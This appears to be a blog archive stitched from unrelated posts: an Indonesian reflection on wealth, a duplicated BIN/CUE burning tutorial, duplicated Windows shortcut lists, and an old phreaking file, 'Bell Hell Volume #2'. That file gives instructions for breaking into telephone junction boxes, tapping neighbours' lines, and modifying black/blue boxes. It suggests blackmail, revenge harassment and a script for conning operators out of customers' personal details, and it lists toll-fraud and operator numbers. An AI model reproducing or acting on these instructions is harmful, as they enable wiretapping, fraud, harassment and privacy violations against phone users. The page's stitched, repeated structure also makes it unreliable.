well, hari ini saya akan memberikan sebuah update mengenai isi buku yang kebetulan saya baca hari.
langsung saja kata-kata bijak yang saya serap hari ini adalah : "makin banyak harta, makin lama penghisabannya di akherat. sedikit harta, makin cepat di hisab di akherat dan makin cepat pula masuk surga bilamana ia termasuk golongan orang-orang yang selamat".
bukan berarti saya menganjurkan kita umat islam untuk melarat, akan tetapi saya menganjurkan umat islam untuk menjadi jutawan, yang mana dengan harta yang banyak tersebut kemudian dipergunakan untuk hal-hal yang baik (termasuk yang wajib yaitu zakat, dan juga amalan-amalan lain yang memberatkan timbangan kebaikan seperti sedekah, memberi makan fakir-miskin, membantu orang-orang yang membutuhkan harta dsb).
intinya.... jangan terlena dengan harta benda yang dimiliki di dunia ini, karena semua itu akan menjadi tanggung jawab pemiliknya dan akan di hisab di hari akherat. harta pun tak akan kita bawa setelah kita mati....
demikian uneg-uneg saya hari ini semoga bermanfaat dan dapat membawa diri saya sendiri maupun pembaca sekalian menjadi insan yang lebih baik...amin
Tuesday, September 20, 2011
Tuesday, August 16, 2011
puasa
shiyam=puasa=imsak=menahan=sabar
sabar adalah pelita
shalat adalah cahaya
sabar kunci kebahagiaan
sabar dan shalat adalah penolong bagi orang-orang yang beriman
Allah bersama orang-orang yang sabar
sabar adalah pelita
shalat adalah cahaya
sabar kunci kebahagiaan
sabar dan shalat adalah penolong bagi orang-orang yang beriman
Allah bersama orang-orang yang sabar
BIN & .CUE simple
BIN & .CUE simple tutorial.
There always seems to be the question "what do I do with a .bin and .cue file" in these forums so I figured I would write a quick and simple tutorial. Please feel free to add more.
So you have downloaded two files, one with a .bin extension and one with a .cue extension. "What do I do with these?" you ask. There are a number of options.
BURN TO CD
You will need either NERO, CDRWIN or FIREBURNER to burn the file.
To burn with NERO:
Start NERO, choose FILE, choose BURN IMAGE, locate the .cue file you have and double click it. A dialog box will come up, for anything other than music make sure you choose DISC-AT-ONCE (DAO). You can also turn off the simulation burn if you so choose.
Then burn away.
To burn with CDRWin:
Start CDRWin, choose the button on the top left, choose LOAD CUESHEET, press START RECORDING.
To burn with Fireburner:
Start Fireburner, click on the button on the bottom left corner "VISUAL CUE BURNER/BINCHUNKER", press the right mouse button and choose LOAD TRACKS FROM .CUE and choose the correct .CUE file, press the right mouse button again and chooseselect "Burn/Test Burn", choose DISK AT ONCE (DAO), disable TEST BURN and MULTISESSION, press OK.
.CUE ERRORS
The most common error you will get with a .cue file is when it points to an incorrect path. This is easily fixed. Find the .bin file, copy the exact title including the .bin extension. Now find the .cue file, open the .cue file using notepad. It should look similar to this:
FILE "name of file.bin" BINARY
TRACK 01 MODE2/2352
INDEX 01 00:00:00
TRACK 02 MODE2/2352
INDEX 00 00:04:00
INDEX 01 00:06:00
Delete everything in the quotes, in this case we would
delete name of file.bin. Now place the title you copied
in between the quotes. Save the changes and close out.
Thats it, your .cue file should work now.
OTHER WAYS TO USE .BIN & .CUE FILES
VCDGear:
This program will allow you to extract MPEG streams from CD images, convert VCD files to MPEG, correct MPEG errors, and more.
Daemon Tools:
This program creates a virtual drive on your PC which will allow you to "mount" the .cue file and use whatever is in the .bin file without having to burn it to a cd.
ISOBuster:
This program will allow you to "bust" open the .bin file and extract the files within the .bin.
_________________
There always seems to be the question "what do I do with a .bin and .cue file" in these forums so I figured I would write a quick and simple tutorial. Please feel free to add more.
So you have downloaded two files, one with a .bin extension and one with a .cue extension. "What do I do with these?" you ask. There are a number of options.
BURN TO CD
You will need either NERO, CDRWIN or FIREBURNER to burn the file.
To burn with NERO:
Start NERO, choose FILE, choose BURN IMAGE, locate the .cue file you have and double click it. A dialog box will come up, for anything other than music make sure you choose DISC-AT-ONCE (DAO). You can also turn off the simulation burn if you so choose.
Then burn away.
To burn with CDRWin:
Start CDRWin, choose the button on the top left, choose LOAD CUESHEET, press START RECORDING.
To burn with Fireburner:
Start Fireburner, click on the button on the bottom left corner "VISUAL CUE BURNER/BINCHUNKER", press the right mouse button and choose LOAD TRACKS FROM .CUE and choose the correct .CUE file, press the right mouse button again and chooseselect "Burn/Test Burn", choose DISK AT ONCE (DAO), disable TEST BURN and MULTISESSION, press OK.
.CUE ERRORS
The most common error you will get with a .cue file is when it points to an incorrect path. This is easily fixed. Find the .bin file, copy the exact title including the .bin extension. Now find the .cue file, open the .cue file using notepad. It should look similar to this:
FILE "name of file.bin" BINARY
TRACK 01 MODE2/2352
INDEX 01 00:00:00
TRACK 02 MODE2/2352
INDEX 00 00:04:00
INDEX 01 00:06:00
Delete everything in the quotes, in this case we would
delete name of file.bin. Now place the title you copied
in between the quotes. Save the changes and close out.
Thats it, your .cue file should work now.
OTHER WAYS TO USE .BIN & .CUE FILES
VCDGear:
This program will allow you to extract MPEG streams from CD images, convert VCD files to MPEG, correct MPEG errors, and more.
Daemon Tools:
This program creates a virtual drive on your PC which will allow you to "mount" the .cue file and use whatever is in the .bin file without having to burn it to a cd.
ISOBuster:
This program will allow you to "bust" open the .bin file and extract the files within the .bin.
_________________
Friday, August 12, 2011
best keyboard shortcuts
Getting used to using your keyboard exclusively and leaving your mouse behind will make you much more efficient at performing any task on any Windows system. I use the following keyboard shortcuts every day:
Windows key + R = Run menu
This is usually followed by:
cmd = Command Prompt
iexplore + "web address" = Internet Explorer
compmgmt.msc = Computer Management
dhcpmgmt.msc = DHCP Management
dnsmgmt.msc = DNS Management
services.msc = Services
eventvwr = Event Viewer
dsa.msc = Active Directory Users and Computers
dssite.msc = Active Directory Sites and Services
Windows key + E = Explorer
ALT + Tab = Switch between windows
ALT, Space, X = Maximize window
CTRL + Shift + Esc = Task Manager
Windows key + Break = System properties
Windows key + F = Search
Windows key + D = Hide/Display all windows
CTRL + C = copy
CTRL + X = cut
CTRL + V = paste
Also don't forget about the "Right-click" key next to the right Windows key on your keyboard. Using the arrows and that key can get just about anything done once you've opened up any program.
Keyboard Shortcuts
[Alt] and [Esc] Switch between running applications
[Alt] and letter Select menu item by underlined letter
[Ctrl] and [Esc] Open Program Menu
[Ctrl] and [F4] Close active document or group windows (does not work with some applications)
[Alt] and [F4] Quit active application or close current window
[Alt] and [-] Open Control menu for active document
Ctrl] Lft., Rt. arrow Move cursor forward or back one word
Ctrl] Up, Down arrow Move cursor forward or back one paragraph
[F1] Open Help for active application
Windows+M Minimize all open windows
Shift+Windows+M Undo minimize all open windows
Windows+F1 Open Windows Help
Windows+Tab Cycle through the Taskbar buttons
Windows+Break Open the System Properties dialog box
acessability shortcuts
Right SHIFT for eight seconds........ Switch FilterKeys on and off.
Left ALT +left SHIFT +PRINT SCREEN....... Switch High Contrast on and off.
Left ALT +left SHIFT +NUM LOCK....... Switch MouseKeys on and off.
SHIFT....... five times Switch StickyKeys on and off.
NUM LOCK...... for five seconds Switch ToggleKeys on and off.
explorer shortcuts
END....... Display the bottom of the active window.
HOME....... Display the top of the active window.
NUM LOCK+ASTERISK....... on numeric keypad (*) Display all subfolders under the selected folder.
NUM LOCK+PLUS SIGN....... on numeric keypad (+) Display the contents of the selected folder.
NUM LOCK+MINUS SIGN....... on numeric keypad (-) Collapse the selected folder.
LEFT ARROW...... Collapse current selection if it's expanded, or select parent folder.
RIGHT ARROW....... Display current selection if it's collapsed, or select first subfolder.
Type the following commands in your Run Box (Windows Key + R) or Start Run
devmgmt.msc = Device Manager
msinfo32 = System Information
cleanmgr = Disk Cleanup
ntbackup = Backup or Restore Wizard (Windows Backup Utility)
mmc = Microsoft Management Console
excel = Microsoft Excel (If Installed)
msaccess = Microsoft Access (If Installed)
powerpnt = Microsoft PowerPoint (If Installed)
winword = Microsoft Word (If Installed)
frontpg = Microsoft FrontPage (If Installed)
notepad = Notepad
wordpad = WordPad
calc = Calculator
msmsgs = Windows Messenger
mspaint = Microsoft Paint
wmplayer = Windows Media Player
rstrui = System Restore
netscp6 = Netscape 6.x
netscp = Netscape 7.x
netscape = Netscape 4.x
waol = America Online
control = Opens the Control Panel
control printers = Opens the Printers Dialog
internetbrowser
type in u're adress "google", then press [Right CTRL] and [Enter]
add www. and .com to word and go to it
For Windows XP:
Copy. CTRL+C
Cut. CTRL+X
Paste. CTRL+V
Undo. CTRL+Z
Delete. DELETE
Delete selected item permanently without placing the item in the Recycle Bin. SHIFT+DELETE
Copy selected item. CTRL while dragging an item
Create shortcut to selected item. CTRL+SHIFT while dragging an item
Rename selected item. F2
Move the insertion point to the beginning of the next word. CTRL+RIGHT ARROW
Move the insertion point to the beginning of the previous word. CTRL+LEFT ARROW
Move the insertion point to the beginning of the next paragraph. CTRL+DOWN ARROW
Move the insertion point to the beginning of the previous paragraph. CTRL+UP ARROW
Highlight a block of text. CTRL+SHIFT with any of the arrow keys
Select more than one item in a window or on the desktop, or select text within a document. SHIFT with any of the arrow keys
Select all. CTRL+A
Search for a file or folder. F3
View properties for the selected item. ALT+ENTER
Close the active item, or quit the active program. ALT+F4
Opens the shortcut menu for the active window. ALT+SPACEBAR
Close the active document in programs that allow you to have multiple documents open simultaneously. CTRL+F4
Switch between open items. ALT+TAB
Cycle through items in the order they were opened. ALT+ESC
Cycle through screen elements in a window or on the desktop. F6
Display the Address bar list in My Computer or Windows Explorer. F4
Display the shortcut menu for the selected item. SHIFT+F10
Display the System menu for the active window. ALT+SPACEBAR
Display the Start menu. CTRL+ESC
Display the corresponding menu. ALT+Underlined letter in a menu name
Carry out the corresponding command. Underlined letter in a command name on an open menu
Activate the menu bar in the active program. F10
Open the next menu to the right, or open a submenu. RIGHT ARROW
Open the next menu to the left, or close a submenu. LEFT ARROW
Refresh the active window. F5
View the folder one level up in My Computer or Windows Explorer. BACKSPACE
Cancel the current task. ESC
SHIFT when you insert a CD into the CD-ROM drive Prevent the CD from automatically playing.
Use these keyboard shortcuts for dialog boxes:
To Press
Move forward through tabs. CTRL+TAB
Move backward through tabs. CTRL+SHIFT+TAB
Move forward through options. TAB
Move backward through options. SHIFT+TAB
Carry out the corresponding command or select the corresponding option. ALT+Underlined letter
Carry out the command for the active option or button. ENTER
Select or clear the check box if the active option is a check box. SPACEBAR
Select a button if the active option is a group of option buttons. Arrow keys
Display Help. F1
Display the items in the active list. F4
Open a folder one level up if a folder is selected in the Save As or Open dialog box. BACKSPACE
If you have a Microsoft Natural Keyboard, or any other compatible keyboard that includes the Windows logo key and the Application key , you can use these keyboard shortcuts:
Display or hide the Start menu. WIN Key
Display the System Properties dialog box. WIN Key+BREAK
Show the desktop. WIN Key+D
Minimize all windows. WIN Key+M
Restores minimized windows. WIN Key+Shift+M
Open My Computer. WIN Key+E
Search for a file or folder. WIN Key+F
Search for computers. CTRL+WIN Key+F
Display Windows Help. WIN Key+F1
Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain. WIN Key+ L
Open the Run dialog box. WIN Key+R
Open Utility Manager. WIN Key+U
accessibility keyboard shortcuts:
Switch FilterKeys on and off. Right SHIFT for eight seconds
Switch High Contrast on and off. Left ALT+left SHIFT+PRINT SCREEN
Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK
Switch StickyKeys on and off. SHIFT five times
Switch ToggleKeys on and off. NUM LOCK for five seconds
Open Utility Manager. WIN Key+U
shortcuts you can use with Windows Explorer:
Display the bottom of the active window. END
Display the top of the active window. HOME
Display all subfolders under the selected folder. NUM LOCK+ASTERISK on numeric keypad (*)
Display the contents of the selected folder. NUM LOCK+PLUS SIGN on numeric keypad (+)
Collapse the selected folder. NUM LOCK+MINUS SIGN on numeric keypad (-)
Collapse current selection if it's expanded, or select parent folder. LEFT ARROW
Display current selection if it's collapsed, or select first subfolder. RIGHT ARROW
Windows key + R = Run menu
This is usually followed by:
cmd = Command Prompt
iexplore + "web address" = Internet Explorer
compmgmt.msc = Computer Management
dhcpmgmt.msc = DHCP Management
dnsmgmt.msc = DNS Management
services.msc = Services
eventvwr = Event Viewer
dsa.msc = Active Directory Users and Computers
dssite.msc = Active Directory Sites and Services
Windows key + E = Explorer
ALT + Tab = Switch between windows
ALT, Space, X = Maximize window
CTRL + Shift + Esc = Task Manager
Windows key + Break = System properties
Windows key + F = Search
Windows key + D = Hide/Display all windows
CTRL + C = copy
CTRL + X = cut
CTRL + V = paste
Also don't forget about the "Right-click" key next to the right Windows key on your keyboard. Using the arrows and that key can get just about anything done once you've opened up any program.
Keyboard Shortcuts
[Alt] and [Esc] Switch between running applications
[Alt] and letter Select menu item by underlined letter
[Ctrl] and [Esc] Open Program Menu
[Ctrl] and [F4] Close active document or group windows (does not work with some applications)
[Alt] and [F4] Quit active application or close current window
[Alt] and [-] Open Control menu for active document
Ctrl] Lft., Rt. arrow Move cursor forward or back one word
Ctrl] Up, Down arrow Move cursor forward or back one paragraph
[F1] Open Help for active application
Windows+M Minimize all open windows
Shift+Windows+M Undo minimize all open windows
Windows+F1 Open Windows Help
Windows+Tab Cycle through the Taskbar buttons
Windows+Break Open the System Properties dialog box
acessability shortcuts
Right SHIFT for eight seconds........ Switch FilterKeys on and off.
Left ALT +left SHIFT +PRINT SCREEN....... Switch High Contrast on and off.
Left ALT +left SHIFT +NUM LOCK....... Switch MouseKeys on and off.
SHIFT....... five times Switch StickyKeys on and off.
NUM LOCK...... for five seconds Switch ToggleKeys on and off.
explorer shortcuts
END....... Display the bottom of the active window.
HOME....... Display the top of the active window.
NUM LOCK+ASTERISK....... on numeric keypad (*) Display all subfolders under the selected folder.
NUM LOCK+PLUS SIGN....... on numeric keypad (+) Display the contents of the selected folder.
NUM LOCK+MINUS SIGN....... on numeric keypad (-) Collapse the selected folder.
LEFT ARROW...... Collapse current selection if it's expanded, or select parent folder.
RIGHT ARROW....... Display current selection if it's collapsed, or select first subfolder.
Type the following commands in your Run Box (Windows Key + R) or Start Run
devmgmt.msc = Device Manager
msinfo32 = System Information
cleanmgr = Disk Cleanup
ntbackup = Backup or Restore Wizard (Windows Backup Utility)
mmc = Microsoft Management Console
excel = Microsoft Excel (If Installed)
msaccess = Microsoft Access (If Installed)
powerpnt = Microsoft PowerPoint (If Installed)
winword = Microsoft Word (If Installed)
frontpg = Microsoft FrontPage (If Installed)
notepad = Notepad
wordpad = WordPad
calc = Calculator
msmsgs = Windows Messenger
mspaint = Microsoft Paint
wmplayer = Windows Media Player
rstrui = System Restore
netscp6 = Netscape 6.x
netscp = Netscape 7.x
netscape = Netscape 4.x
waol = America Online
control = Opens the Control Panel
control printers = Opens the Printers Dialog
internetbrowser
type in u're adress "google", then press [Right CTRL] and [Enter]
add www. and .com to word and go to it
For Windows XP:
Copy. CTRL+C
Cut. CTRL+X
Paste. CTRL+V
Undo. CTRL+Z
Delete. DELETE
Delete selected item permanently without placing the item in the Recycle Bin. SHIFT+DELETE
Copy selected item. CTRL while dragging an item
Create shortcut to selected item. CTRL+SHIFT while dragging an item
Rename selected item. F2
Move the insertion point to the beginning of the next word. CTRL+RIGHT ARROW
Move the insertion point to the beginning of the previous word. CTRL+LEFT ARROW
Move the insertion point to the beginning of the next paragraph. CTRL+DOWN ARROW
Move the insertion point to the beginning of the previous paragraph. CTRL+UP ARROW
Highlight a block of text. CTRL+SHIFT with any of the arrow keys
Select more than one item in a window or on the desktop, or select text within a document. SHIFT with any of the arrow keys
Select all. CTRL+A
Search for a file or folder. F3
View properties for the selected item. ALT+ENTER
Close the active item, or quit the active program. ALT+F4
Opens the shortcut menu for the active window. ALT+SPACEBAR
Close the active document in programs that allow you to have multiple documents open simultaneously. CTRL+F4
Switch between open items. ALT+TAB
Cycle through items in the order they were opened. ALT+ESC
Cycle through screen elements in a window or on the desktop. F6
Display the Address bar list in My Computer or Windows Explorer. F4
Display the shortcut menu for the selected item. SHIFT+F10
Display the System menu for the active window. ALT+SPACEBAR
Display the Start menu. CTRL+ESC
Display the corresponding menu. ALT+Underlined letter in a menu name
Carry out the corresponding command. Underlined letter in a command name on an open menu
Activate the menu bar in the active program. F10
Open the next menu to the right, or open a submenu. RIGHT ARROW
Open the next menu to the left, or close a submenu. LEFT ARROW
Refresh the active window. F5
View the folder one level up in My Computer or Windows Explorer. BACKSPACE
Cancel the current task. ESC
SHIFT when you insert a CD into the CD-ROM drive Prevent the CD from automatically playing.
Use these keyboard shortcuts for dialog boxes:
To Press
Move forward through tabs. CTRL+TAB
Move backward through tabs. CTRL+SHIFT+TAB
Move forward through options. TAB
Move backward through options. SHIFT+TAB
Carry out the corresponding command or select the corresponding option. ALT+Underlined letter
Carry out the command for the active option or button. ENTER
Select or clear the check box if the active option is a check box. SPACEBAR
Select a button if the active option is a group of option buttons. Arrow keys
Display Help. F1
Display the items in the active list. F4
Open a folder one level up if a folder is selected in the Save As or Open dialog box. BACKSPACE
If you have a Microsoft Natural Keyboard, or any other compatible keyboard that includes the Windows logo key and the Application key , you can use these keyboard shortcuts:
Display or hide the Start menu. WIN Key
Display the System Properties dialog box. WIN Key+BREAK
Show the desktop. WIN Key+D
Minimize all windows. WIN Key+M
Restores minimized windows. WIN Key+Shift+M
Open My Computer. WIN Key+E
Search for a file or folder. WIN Key+F
Search for computers. CTRL+WIN Key+F
Display Windows Help. WIN Key+F1
Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain. WIN Key+ L
Open the Run dialog box. WIN Key+R
Open Utility Manager. WIN Key+U
accessibility keyboard shortcuts:
Switch FilterKeys on and off. Right SHIFT for eight seconds
Switch High Contrast on and off. Left ALT+left SHIFT+PRINT SCREEN
Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK
Switch StickyKeys on and off. SHIFT five times
Switch ToggleKeys on and off. NUM LOCK for five seconds
Open Utility Manager. WIN Key+U
shortcuts you can use with Windows Explorer:
Display the bottom of the active window. END
Display the top of the active window. HOME
Display all subfolders under the selected folder. NUM LOCK+ASTERISK on numeric keypad (*)
Display the contents of the selected folder. NUM LOCK+PLUS SIGN on numeric keypad (+)
Collapse the selected folder. NUM LOCK+MINUS SIGN on numeric keypad (-)
Collapse current selection if it's expanded, or select parent folder. LEFT ARROW
Display current selection if it's collapsed, or select first subfolder. RIGHT ARROW
Bell Hell Volume #2
///////////////////////////////**\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\**///////////////////////////////////
///// ** M \\\\\\
\\\\\ ** Bell Hell Volume #2 METAL! E //////
///// ** KICKS! T \\\\\\
\\\\\ ************ By: The Dutchman A C //////
///// Neon**Knights -Wired L O \\\\\\
\\\\\ ** M //////
///// ** Thanx to: Baby Demon & The Metallian M \\\\\\
\\\\\ ** U //////
///// ** Call These Genocidal Systems... N \\\\\\
\\\\\ ** I //////
///// /\/\etalland 1 10mgs/AE/BBS/Cat-Fur[503]538-0761 C \\\\\\
\\\\\ /\/\etalland ][ AE/Cat-Fur Line.....[503]253-5300 A //////
///// The /\/\etal AE PW: KILL............[201]879-6668 T \\\\\\
\\\\\ The Cheese ][ 10mgs/AE/BBS/Cat-Fur[409]696-7983 I //////
///// Milliways 10mgs BBS...........[609]921-1994 O \\\\\\
\\\\\ 7 Gates of Hell BBS.................[415]697-1320 N //////
///// The Mordor AE 1200bps/Cat-Fur/10mg[201]528-6467 S \\\\\\
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\**///////////////////////////////////
///////////////////////////////**\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
/CONTENTS/
In vol. I we discussed some of the minor aspects of bell hell. Now we shall
enter the realm of serious bell hell, including how to crush AT&T's firm grip
on the wired industry and Ma's underground passages.
/MA'S CODES ETC./
In order to make things easier for her employees, Ma has given us not only
free access to almost all her treasures but guides next to them to help us
along the way. One of the more common boxes found are the ones located either
at the end of your street, in an adjacent field or on telephone poles. Any of
these boxes contains all the lines for the surrounding neighbourhood. Ma
usually supplys a code for the wires inside on the side of the door to one of
these boxes, if not the code usually goes like this:
Red (ring-) = Ring line, allows others to call you
Green (tip+) = Calling out line, for you to call others
Ma has conveniently located these, the red on the right and the green on the
left. If you run into one of these boxes and it's locked then you'll need to
purchase is either a 1/2" crowbar or an 7/16" hex driver, prefferably the
latter. In order to use the 7/16, simply give a 1/8" turn counter clockwise,
presto you are in. The crowbar is self explanatory I believe.
The other, and less likely to be found of the bell underground network is just
that, the underground network. To find one of these simply look for a manhole
cover with a bell in the middle instead of an S or what-ever you sanitary
dept. might use. The aspects and entry of these will be discussed later in
this article, now to the boxes.
Now that you are in one of these boxes there is a rather interesting list of
prospects you can do, connect a linesmans handset, connect a box, or eavesdrop
to name a few, here's some of the ways to do the following.
Hell #1:
/LINESMANS HANDSET/
In order to make a linesmans handset (if not included within the newly found
box) you'll need a few things:
1 a phone (prefferably a GTE flip fone or a slimline)
2 a spliceing knife (any knife will do, the sharper the better)
3 a set of alligator clamps (if not already within the box)
Now take your knife and cut off all the wires and the modular jack (if one)
saving the red (ring-) and green (tip+) wires. Now attach the alligator clips,
one to the red and one to the green, and your set. All you need do is attach
the alligator clips to the designated colors on the box (red - red/green -
green) and you have essentially become an extension of that line.
Hell #2:
/THE BLACK/BLUE BOX/
Finally a place where you can use that box of yours with minimal worries of
being caught (the only way would be to get caught red-handed). Ah yes, bell
hell at one of its finer points. Commonly it takes Ma about a month or so to
figure out the trip on this one.
If you are unfamilar with boxes, the black box allows others to call you free
where-as the blue box allows you to use operator lines and even become one of
the bitches (become an operator). For more info I would suggest consulting
black/blue box plans.
Use the normal plans for a black/blue box and make the following
modifications:
Equipment:
(1) SPST SWITCH (found at your local Trash Shack)
(1) 10K OHM 1/2 WATT 10% RESISTOR (same as above)
SOME EXTRA WIRE (same as above above)
Now disconnect the green wire in the box and connect it to one of the two
poles on the SPST switch. Take a piece of your extra wire connect one end to
the other pole on your SPST switch and the other end to the
place the 10k ohm resistor between the
Connect it (the 10k ohm resistor) via wire to the two. The
should have a green wire going to it and the
and blue wire connected to it. Your finished product should look something
like this:
--/-/--
:S P S T:
-------
:: ::
-----GREEN WIRE--:: ::----
!
10K OHM
!
!
-----WHITE WIRE-----------\\
------BLUE WIRE-----------------
This is simply the basic wiring, if you decide to become one with advancement
you might try hooking up lights to go on when your online or perhaps a
recorder, what-ever you wish.
Hell #3
/EAVES-DROPPING/
There are many various ways to accomplish this, seeing how I like to stick to
basics I will describe what I feel is the easiest by far. First you need to
make a linesmans handset as mentioned above if you already haven't. Now simply
disconnect the sending end (the end you talk through) and listen in. From here
you can accomplish several various tasks. If you are into blackmail you can
hook up a tape recorder (if you want to do this you can leave me a msg. or
wait for another file later, its rather a long task) or you may simply hold
the recorder to the listening end of the phone. To find out about the line
etc. You can do a couple of things, first you can dial your ANI (automatic
number identification) and find out the line you are on, after this call, you
are a local CN/A (described below) and run a check on who's line it is etc.
This can bring all kinds of hell for those not-so-trustworthy wifes/husbands.
More Hell:
/OTHER TRICKS/
You can set up a conference call simply by dialing your conference operator
(0-700-456-1000) and setting it up, just do what she says. I suggest this
operator for her lines are superior to those of the bitchy PBX ones. Oh,
you'll also need to know that lines person, address etc. Just pull an ANI and
then an CN/A on it.
If you have an urge to get back at someone simply attach your linesmans
handset to the persons line (fine their line as mentioned many times before)
and leave it off the hook. You can imagine just how long it could take Ma's
loyal employees to discover the problem. Possibly weeks if not a month.
Using the persons line to call computer systems that trace. This also goes
under the heading 'getting back at people' for the hassles you'll cause them
when the line is traced to them is numerous, bitchy Ma employees tend to be
irrational, spoiled children when it comes to busting people.
Bugging the operator - self explanatory.
RAISE HELL
/Insider/ - The rest of this doc is mainly explanations, a little hell and a
few other things I decided to throw in instead of making another Vol.. It's
true purpose is to coincide with Vol. I, as well as take up space, the rest is
unknown.
-----------
800 EXTENDERS
-----------
Basically, 800 extenders are much like Save-Net or Am-Net going 800 instead of
local access numbers. With this one you can call anywhere in the U.S. for
free, of course you need the X digit code, but this is easily found. You use
these just like you would if you were using Save-Net, i.e. you would dial
1-800-XXX-XXXX, then enter in your X digit code and then the area code + the
number you wish to reach, i.e. 1800521167429125036358443, as you can see there
is an 800 number followed by a 4 digit code followed by a number wished to be
reached. Here's a few 800 extenders, theres many many more:
1-800- 1-800-
------- -------
245-4890 4 DIGITS 327-6713 4 DIGITS
243-7650 6 DIGITS 328-7112 4 DIGITS
654-8494 6 DIGITS 327-9895 7 DIGITS
327-9136 4 DIGITS 227-3414 4 DIGITS
682-4000 6 DIGITS 343-1844 4 DIGITS
858-9000 3 DIGITS 521-1674 4 DIGITS
537-3511 8 DIGITS 843-0698 9 dIGITS
=-=-=-=-=-=-=------------------------->
LOOP NUMBERS EXPLORED
Loop numbers simply connect two people together using two different numbers.
Thus these numbers always come in pairs, one being the higher one while the
other being the lower one. So if you were to use one, you would call one of
the pair and the other one would call the other one (you take the high road
I'll take the low road). Loop numbers are equal in quality as calling direct,
thus it would be the same quality as you would get calling your neighbour. If
you would happen to call a loop number and no one was on the other end one of
two things would happen, if you called the higher of the two you would here
silence, if you dialed the lower you would get a 1000 hertz tone. Heres a list
of some loop numbers:
Area Code 212
XXX-9979 (HIGH)
XXX-9977 (LOW)
XXX= 690,534,569,432,868,255,228,677,982,466,926,220,586,524,283
XXX-9906 (HIGH)
XXX-9900 (LOW)
XXX= 529,352,439,388
Where you see XXX you enter the prefix desired, thus if you wanted area code
212, you could choose a prefix say 690, so one person would dial 690-9906 and
the other 690-9900.
In order to scan for loop numbers you'll need a friend to help. Loop numbers
run in pairs, the combination is 00XX and XX99. So what you need is for one
person to scan one end while the other scans the upper (using the same
prefix). The hang side has no tone while the other gives off a 1000hz tone.
To use a loop number in order to start a conference call simply have one
person get on the hangside while another calls the conferenceing operator (PBX
operator will do). The person calling the operator (hopefully from a fortress
phone) should charge the call to the upper loop number (the one the other
person isn't on), when the operator calls to verify she'll get your freind,
who of course will accept all charges gladly.
=-=-=-=-=-=-=------------------------->
Customer name and address
(CN/A)
A CN/A operator is disagnated for the use of AT&T employees who need some
information on a certain person. Ex- A Bell cop got a persons name from a nark
or whatever, he needs more info about the person so he calls up the CN/A
operator and asks her for the persons where abouts. Ma has been nice enough to
grant these operators the knowledge of a few more things (Ma's slip up), such
as their phone number. Thus we can call up one of these operators, say,'Hi, my
names Joe Rodrequiz and I'm from the Lake Oswego Bell customer service
department, I need the following info on a 'Jack Suchos'.' Then you become
really nice and ask if you can have that persons phone number so you don't
have to go over there. Since these operators are human, and are easily conned
and are very informed they'll give you just about whatever you need to know.
However you must be polite and business like. Following is a list of CN/A's,
to use it, find your area code and the CN/A operators number will follow:
DUTCHMAN DIRECTORY
AREA CODE PHONE NUMBER
---------- ---------------
201 201-676-7070
202 301-384-9820
203 203-789-6815
204 204-949-0900
205 205-988-7000
206 206-382-8000
207 617-787-2750
208 303-399-4200
209 415-546-1341
212 518-471-8111
213 213-501-4144
214 214-948-5731
215 412-633-5600
216 614-464-2345
217 217-525-7000
218 402-345-0600
219 317-265-4834
301 301-534-1168
302 412-633-5600
303 303-399-4200
304 304-344-8041
305 912-784-9111
306 NONE....NONE
307 303-399-4200
308 402-345-0600
309 217-525-7000
312 312-796-9600
313 313-223-8690
314 314-726-7142
315 518-471-8111
316 816-275-2782
317 317-265-4834
318 318-227-1551
319 402-345-0600
401 617-787-2760
402 402-345-0600
403 403-425-2652
404 912-784-9111
405 405-236-6121
406 303-399-4200
408 415-546-1132
412 412-633-5600
413 617=787-2760
414 608-252-6932
415 415-546-1132
416 416-922-6686
417 314-726-7142
418 514-861-2635
419 614-464-2345
501 405-236-6121
502 502-583-2861
503 203-784-6815
504 504-245-5330
505 303-399-4200
506 506-657-3855
507 402-345-0600
509 206=382-8000
512 512-828-2501
513 714-464-2345
514 514-861-2635
515 402-345-0600
516 518-471-8111
517 313-223-8690
518 518-471-8000
519 416-922-6686
601 601-961-0877
602 303-399-4200
603 617-787-2750
604 604-432-2996
605 402-345-0600
606 502-583-2681
607 518-471-8111
608 608-252-6932
609 201-676-7070
612 402-345-0600
613 416-922-6686
614 614-464-2345
615 615-373-5791
616 313-223-8690
617 617-787-2750
618 217-525-7000
701 402-345-0600
702 415-546-1341
703 804-747-1411
704 912-784-9111
705 416-922-6686
707 415-546-1132
709 NONE....NONE
712 402-345-0600
713 713-820-4112
714 213-501-4144
715 608-252-6932
716 518-471-8111
717 412-633-5600
801 303-399-4200
802 617-787-2750
803 912-784-9111
804 804-747-1411
805 415-546-1341
806 512-828-2501
807 416-922-6686
808 212-334-4336
809 LIST BELOW
812 317-265-4834
813 813-223-9678
814 412-633-5600
815 217-525-7000
816 816-275-2782
817 214-948-5731
819 514-861-2635
901 615-373-5791
902 902-421-4110
903 NONE....NONE
904 912-784-9111
906 313-223-8690
907 NONE....NONE
912 912-784-9111
913 816-275-2782
914 518-471-8111
915 512-828-2501
916 415-546-1341
918 405-236-6121
919 912-784-9111
900+(DIAL-IT) NUMBERS: 212-334-3611
FOR BAHAMAS, BERMUDA, DOMINICAN REP, JAMAICA AND PUERTO RICO: 212-334-4336
Downloaded From P-80 Systems 304-744-2253
Bell Hell Volume #1
////////////////////////////////////**\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\**////////////////////////////////////////
///// ** M \\\\\\
\\\\\ ** Bell Hell Volume #1 E //////
///// ** T \\\\\\
\\\\\ ************ By: The Dutchman A C //////
///// Neon**Knights -Wired L O \\\\\\
\\\\\ ** M //////
///// ** Thanx to: Baby Demon & The Metallian M \\\\\\
\\\\\ ** U //////
///// ** Call These Genocidal Systems... N \\\\\\
\\\\\ ** 0 I //////
///// ** /\/\etalland 1 10mgs/AE/BBS/Cat-Fur[503]538-0761 C \\\\\\
\\\\\ /\/\etalland ][ AE/Cat-Fur Line.....[503]253-5300 A //////
///// METAL! The /\/\etal AE PW: KILL./..........[201]879-6668 T \\\\\\
\\\\\ KICKS! The Cheese ][ 10mgs/AE/BBS/Cat-Fur[409]696-7983 I //////
